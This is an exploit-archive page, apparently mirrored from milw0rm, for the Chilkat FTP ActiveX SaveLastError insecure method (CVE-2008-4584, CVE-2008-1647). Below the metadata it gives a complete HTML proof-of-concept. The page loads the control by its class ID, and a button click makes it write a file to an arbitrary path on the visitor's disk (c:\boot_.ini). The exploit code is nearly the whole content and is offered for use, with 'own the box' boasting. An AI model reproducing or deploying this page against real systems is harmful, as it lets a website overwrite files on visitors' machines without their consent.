[] NeoSense
E X P L O I T S
title author type platform port cve id

Chilkat FTP - ActiveX (SaveLastError) Insecure Method

Author: callAX
type: remote
platform: windows
port: 
date_added: 2008-12-27 
date_updated:  
verified: 1 
codes: CVE-2008-4584;CVE-2008-1647;OSVDB-49168;OSVDB-43935 
tags: 
aliases:  
screenshot_url:  
application_url: 
<html>
<title>ChilkatSocket.DLL Arbitrary File Creation ChilkatFTP.dll v3.0.0.2</title><br><br>
<body>
<h3>ChilkatSocket.DLL Arbitrary File Creation ChilkatFTP.dll v3.0.0.2 Arbitrary Data Write Exploit</h3>

<!c0d3d by callAX
*-*-*-*-*
0wN thE b0x p4l
*_*-*_*_*
Greetings to str0ke and Fr0git0-->

<HTML>
<BODY>
 <object id=ctrl classid="clsid:{3B598BD0-AF50-48C6-B6A5-63261A48B054}"></object>

<SCRIPT>

function Do_it()
 {
   File = "c:\\boot_.ini"
   ctrl.SaveLastError(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="S3nd me to thls HD">
</body>
</HTML>

# milw0rm.com [2008-12-28]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.